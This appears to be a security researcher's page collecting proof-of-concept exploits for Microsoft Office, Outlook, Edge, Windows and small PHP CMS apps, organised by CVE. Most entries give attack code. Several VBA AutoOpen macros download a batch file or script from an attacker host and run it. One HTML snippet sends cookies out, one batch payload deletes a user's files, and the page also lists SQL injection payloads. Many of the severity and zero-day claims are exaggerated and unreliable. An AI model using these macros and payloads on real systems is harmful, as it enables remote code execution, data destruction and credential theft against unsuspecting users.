CVE-2023-33148

Vendor

Description:

The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious WORD file in the Outlook app which is a part of Microsoft Office 365 and easily can trick the victim to click on it – opening it and executing a very dangerous shell command, in the background of the local PC. This execution is without downloading this malicious file, and this is a potential problem and a very dangerous case! This can be the end of the victim’s PC, it depends on the scenario.
WARNING! Office 365 executes files directly from Outlook, without temp downloading, security checking and etc.

Staus: HIGH Vulnerability

[+]Exploit:

• – – NOTE:
  This exploit is connected to the third-party server, and when the victim clicks on it and opens it the content of the script which is inside will fetch on the machine locally and execute himself by using MS Office 365 and Outlook app which is a part of the 365 API.
  

Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat && .\salaries.bat", vbNormalFocus)
End Sub

Reproduce:

href

Proof and Exploit

href

Time spend:

00:35:00

CVE-2023-33131-Microsoft Outlook Remote Code Execution Vulnerability

Description:

In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content
to everyone who uses the Outlook app, no matter web or local.
Microsoft still doesn’t have a patch against this 0-day vulnerability today.

Staus: HIGH Vulnerability

[+]Exploit:

• The malicious Word file:
  

Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub

Reproduce:

href

Proof and Exploit

href

Time spend:

00:30:00

CVE-2023-33145

Vendor

Description:

The type of information that could be disclosed if an attacker successfully exploited this vulnerability is data inside the targeted website like IDs, tokens, nonces, cookies, IP, User-Agent, and other sensitive information.
The user would have to click on a specially crafted URL to be compromised by the attacker.
In this example, the attacker uses STRIDE Threat Modeling to spoof the victim to click on his website and done.
This is the general spoofing vulnerability and does not cover only EDGE, all browsers can be manipulated this way
on every OS. This will be hard to detect.

ADD: 07.07.23
This is a general spoofing problem, and it is not connected only with Edge.
From Microsoft writing bullshits again. This can happen on every OS.

BR

Conclusion:

Please be careful, for suspicious sites or be careful who sending you an link to open!

Staus: HIGH Vulnerability

[+]Exploit:

• Exploit Server:
  

## This is a Get request from the server when the victims click! And it is enough to understand this vulnerability! =)

<script> var i = new Image(); i.src="PoCsess.php?cookie="+escape(document.cookie)</script>

## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty

Reproduce:

href

Proof and Exploit

href

Time spend:

01:30:00

CVE-2023-33137

Vendor

Software

Description:

This exploit is connected with third part exploit server, which waits for the victim to call him and execute the content from him using the pipe posting method! This is absolutely a 0-day exploit! This is absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST request to the exploit server, and the server is responding back that way: He creates another hidden malicious file and executed it directly on the machine of the victim, then everything is disappeared, so nasty.

STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!

[+]Exploit:

Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub

Reproduce:

href

Proof and Exploit:

href

Time spend:

01:27:00

CVE-2023-33140

Description:

Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised.
Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker.

STATUS: 6.5 MEDIUM Vulnerability

[+]Exploit:

Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub

[+]Inside-exploit

@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*

Reproduce:

href

Proof and Exploit:

href

Time spend:

01:15:00

Description:

The IE suffers from bypassing its own security and warning security. After the usual user visits the malicious link from the attacker he will be pushed to download a malicious file from some malicious server that uses a pushing method to force the victim to download a dangerous file. After the victim executes the already downloaded file without any warning the attacker will use the already opened connection as a result of the user’s interactions, with his PC and then he can do very malicious things with this PC, it depends on the scenario.

STATUS: High Vulnerability with a low success rate.

PoC:

CVE-2023-24935

Description:

The attacker easily can exploit the victim to click on his malicious webpage, which will trigger an information gathering, WebSocket, or more dangerous gettering information code or an even more bad situation. From this URL, the victim can trick himself, into downloading an evil softer, without any warnings, like a save button or etc. After this happens the victim is will be in serious trouble!

Staus: HIGH Vulnerability

[+]Exploit:

• Exploit Server:
  

<!DOCTYPE html>
<html>
<body>

	<a href="PoC.php?subject=PHP&web=Microsoft.com">Please visit the information page of Microsoft, this link is not working now.</a>

</body>
</html>

Proof and Exploit

href

Time spend:

03:30:00

CVE-2023-28285

Vendor

Software

Description:

The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim’s computer. The attacker can trick the victim to open a malicious web page by using a malicious Word file for Office-365 API. After the user will open the file to read it, from the API of Office-365, without being asked what it wants to activate, etc, he will activate the code of the malicious server, which he will inject himself, from this malicious server. Emedietly after this click, the attacker can receive very sensitive information! For bank accounts, logs from some sniff attacks, tracking of all the traffic of the victim without stopping, and more malicious stuff, it depends on the scenario and etc.

STATUS: HIGH Vulnerability

Exploit information:

The exploit server must be BROADCASTING when the victim opens the infected file!

Proof and Exploit

href

Time spend:

01:30:00

CVE-2023-28311-Microsoft-Word-Remote-Code-Execution-Vulnerability

Vendor

Description:

The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim’s computer. The attacker can trick the victim to open a malicious web page by using a Word malicious file and he can steal credentials, and bank accounts information, sniffing and tracking all the traffic of the victim without stopping – it depends on the scenario and etc.

STATUS: HIGH Vulnerability

[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!

  Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)

Reproduce:

href

Reference:

href

href

Proof and Exploit

href

Time spend:

01:00:00

CVE-2023-24892:Microsoft-Edge-(Chromium-based)-Webview2-Spoofing-Vulnerability

Description:

The Webview2 development platform is vulnerable to Spoofing attacks.
The attacker can build a very malicious web application and spread it to the victim’s networks, by using a malicious server for this case,
and when they downloaded it and open it this can be the last web app opening for them. The web application contains a malicious link and this URL can be absolutely dangerous for the victim who opened it.

STATUS: HIGH Vulnerability

[+]Exploit structure:

namespace CVE_2023_24892
{
    partial class Form1
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        #region Windows Form Designer generated code

        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.webView21 = new Microsoft.Web.WebView2.WinForms.WebView2();
            ((System.ComponentModel.ISupportInitialize)(this.webView21)).BeginInit();
            this.SuspendLayout();
            // 
            // webView21
            // 
            this.webView21.AllowExternalDrop = false;
            this.webView21.CreationProperties = null;
            this.webView21.DefaultBackgroundColor = System.Drawing.Color.Magenta;
            this.webView21.Location = new System.Drawing.Point(1, 49);
            this.webView21.Name = "webView21";
            this.webView21.Size = new System.Drawing.Size(797, 402);
            this.webView21.Source = new System.Uri("https://www.pornhub.com/", System.UriKind.Absolute);
            this.webView21.TabIndex = 0;
            this.webView21.ZoomFactor = 1D;
            // 
            // Form1
            // 
            this.AutoScaleDimensions = new System.Drawing.SizeF(8F, 16F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.ClientSize = new System.Drawing.Size(800, 450);
            this.Controls.Add(this.webView21);
            this.Name = "Form1";
            this.Text = "CVE-2023-24892";
            ((System.ComponentModel.ISupportInitialize)(this.webView21)).EndInit();
            this.ResumeLayout(false);

        }

        #endregion

        private Microsoft.Web.WebView2.WinForms.WebView2 webView21;
    }
}

href

Reproduce:

href

Proof and Exploit:

href

More:

href

Time spend:

03:00:00

CVE-2023-23398

Description:

The attack itself is carried out locally by a user with authentication to the targeted system. An attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim’s computer. The attacker can trick the victim to open a malicious web page by using an Excel malicious file and he can steal credentials, bank accounts information, sniffing and tracking all the traffic of the victim without stopping – it depends on the scenario and etc.

PoC

NOTE:

This is a Social Engineering custome user interaction spoofing method!

Usage

1. Prepare your PoC.xlsm file with your information for your exploit server!
   
2. Send to the victim by using the Social Engineering method.
   
3. Wait until the victim click’s on it.
   

[+]Exploit:

Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:http://192.168.100.96/"
End Sub

[+]Exploit + Curl Piping:

WARNING:

The exploit server must be BROADCASTING at the moment when the victim hit the button of the exploit!

Sub silno_chukane()
  Call Shell("cmd.exe /S /c" & "curl -s http://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)
End Sub

Reference:

href

href

Proof and Exploit

href

CVE-2023-23396 – Code Name Butterfly Effect

Description:

The attacker could exploit this vulnerability by convincing a victim to open a specially crafted XLSX file which when opened would cause a denial-of-service condition for other processes running on that machine. The victim can lose all the work – information which he currently works on it, and the company which is the actual employer of this victim can lose money because of this problem.

Reference:

href

Proof and Exploit:

href

Time spend:

03:00:00

CVE-2023-23399

Description:

The malicious user can exploit the victim’s PC remotely.
For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.
In this case, the malicious excel file create a very dangerous shell execution file, and after the victim will execute it, his PC maybe will never wake up normally, it depends on the case, which is very nasty.

STATUS: HIGH Vulnerability

[+]Exploit0:

Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://pornhub.com/"
End Sub

[+]Exploit1:

Sub cmd()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "cmd.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub

Reproduce:

href

Proof and Exploit:

href

Proof and Exploit, danger example:

href

Time spend:

03:00:00

CVE-2023-21752 – Windows Backup service – Privilege Escalation

Description:

Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup service – Privilege Escalation vulnerability.
An attacker who successfully exploited this vulnerability could gain SYSTEM privileges
and could delete data that could include data that results in the service being unavailable.

STATUS: HIGH Vulnerability – CRITICAL

[+] Exploit:

href

Reproduce:

href

Proof and Exploit:

href

Reference:

href

FAQ from Microsoft

What privileges could be gained by an attacker who successfully exploited the vulnerability?
An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.
According to the CVSS metrics, successful exploitation of this vulnerability could lead to no loss of confidentiality (C:N) but have major impact on integrity (I:H) and on availability (A:H). What does that mean for this vulnerability?
This vulnerability does not allow disclosure of any confidential information, but could allow an attacker to delete data that could include data that results in the service being unavailable.

RPC

Remote procedure call (RPC)

Affected Releases:

Jan 10, 2023
Windows 10 Version 1809 for 32-bit Systems
-
Elevation of Privilege
Important
5022286 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 20H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 20H2 for 32-bit Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 20H2 for x64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 Version 22H2 for x64-based Systems
-
Elevation of Privilege
Important
5022303 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 21H2 for x64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 22H2 for x64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 21H2 for 32-bit Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 version 21H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022287 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 version 21H2 for x64-based Systems
-
Elevation of Privilege
Important
5022287 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 21H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 22H2 for 32-bit Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 11 Version 22H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022303 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 22H2 for ARM64-based Systems
-
Elevation of Privilege
Important
5022282 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 7 for 32-bit Systems Service Pack 1
-
Elevation of Privilege
Important
5022338 
5022339 
Monthly Rollup 
Security Only 
CVE-2023-21752
Jan 10, 2023
Windows 10 for 32-bit Systems
-
Elevation of Privilege
Important
5022297 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1607 for x64-based Systems
-
Elevation of Privilege
Important
5022289 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 for x64-based Systems
-
Elevation of Privilege
Important
5022297 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 7 for x64-based Systems Service Pack 1
-
Elevation of Privilege
Important
5022338 
5022339 
Monthly Rollup 
Security Only 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1809 for x64-based Systems
-
Elevation of Privilege
Important
5022286 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1607 for 32-bit Systems
-
Elevation of Privilege
Important
5022289 
Security Update 
CVE-2023-21752
Jan 10, 2023
Windows 10 Version 1809 for ARM64-based Systems
-
Elevation of Privilege
Important
5022286 
Security Update 
CVE-2023-21752

Description:

The author parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks.
The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

STATUS: HIGH Vulnerability

[+]Payload:

---
Parameter: author (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: author=admin'+(select load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+'' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
---

Reproduce:

href

Proof and Exploit:

href

CVE-2022-30174

Description:

Microsoft Office Remote Code Execution Vulnerability.
This attack requires a specially crafted file to be placed either in an online directory or in a local network location.
When a victim runs this file, it loads the malicious DLL or EXE file.

WARNING:

Use your Windows Defender turned on and update him regularly!!!

Conclusion:

• • So. I’ve decided to test this stupid and forever stupid thing MS Office 365 which is from 7 maybe 10 years just like that. Some things will never change.
    

• Tested on Windows 11.

• 365 don’t give a f*** what you give him to execute, it depends on the lure…

• For the usual users: If you don’t have some virus protection software, you are lost…😯 😝 🤫 😛 😎

• STATUS: Medium vulnerability but it is there! Watch out, dear friends! 😎

Proof and Exploit:

href

CVE-2022-29110

Description:

The Microsoft 365 version 2204-Build-15128.20178 is vulnerable to RCE.
The malicious attacker can share a malicious .docm file in some of the internal or external networks by using an FTP malicious server and he can infect all computers in this network. The infected user can visit a very dangerous website and when he clicks it he can execute a bunch of javascript malicious codes or can execute a dangerous local code! Also, the malicious author can use a USB flash memory to infect every computer by using Microsoft 365 software.

Known Affected Software

Vendor 	Product 	Version
Microsoft 	Microsoft_Excel	2016 (32-bit edition)
Microsoft 	Microsoft_Excel	2016 (64-bit edition)
Microsoft 	Microsoft_Excel	2013 RT Service Pack 1
Microsoft 	Microsoft_Excel	2013 Service Pack 1 (32-bit editions)
Microsoft 	Microsoft_Excel	2013 Service Pack 1 (64-bit editions)
Microsoft 	Microsoft_Office_Web_Apps	Server 2013 Service Pack 1

Reproduce:

href

Proof and Exploit

href

CVE-NU11-2021-1101

Description:

The OPH – PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication and PHPSESSID Hijacking.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts.
Also, the attacker can use PHPSSESSID to steal the session to the admin account. Disaster, online payment system WTF.

Reproduce:

href

Proof

href

CVE-2022-21906

Microsoft

Vendor

Description

Windows Defender Application Control Security Feature Bypass Vulnerability.
The attacker can execute extremely dangerous apps by using different scenarios,
directly from the user profile, without any reaction from the side of the Windows Defender.
Read more: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21906

The latest version of Windows 10 Pro, plus the latest update!

Reproduce:

href

Proof and Exploit

href

BugCheck after the exploit, the reaction of the kernel:

• BSOD.exe
  

1: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied}  A process has requested access to an object, but has not been granted those access rights.

BUGCHECK_CODE:  c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

PROCESS_NAME:  BSOD.exe

SYMBOL_NAME:  nt!PopTransitionSystemPowerStateEx+1217

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

FAILURE_BUCKET_ID:  STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

FAILURE_ID_HASH:  {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup:     MachineOwner
---------

• malicious.exe
  

0: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Unknown bugcheck code (c0000022)
Unknown bugcheck description
Arguments:
Arg1: 0000000000000000
Arg2: 0000000000000000
Arg3: 0000000000000000
Arg4: 0000000000000000

Debugging Details:
------------------


ERROR_CODE: (NTSTATUS) 0xc0000022 - {Access Denied}  A process has requested access to an object, but has not been granted those access rights.

BUGCHECK_CODE:  c0000022

BUGCHECK_P1: 0

BUGCHECK_P2: 0

BUGCHECK_P3: 0

BUGCHECK_P4: 0

PROCESS_NAME:  malicious.exe

SYMBOL_NAME:  nt!PopTransitionSystemPowerStateEx+1217

MODULE_NAME: nt

IMAGE_NAME:  ntkrnlmp.exe

FAILURE_BUCKET_ID:  STATUS_ACCESS_DENIED_nt!PopTransitionSystemPowerStateEx

FAILURE_ID_HASH:  {7fcb0a96-b639-2e09-82d6-2eef48bdcdea}

Followup:     MachineOwner
---------

BR

nu11secur1ty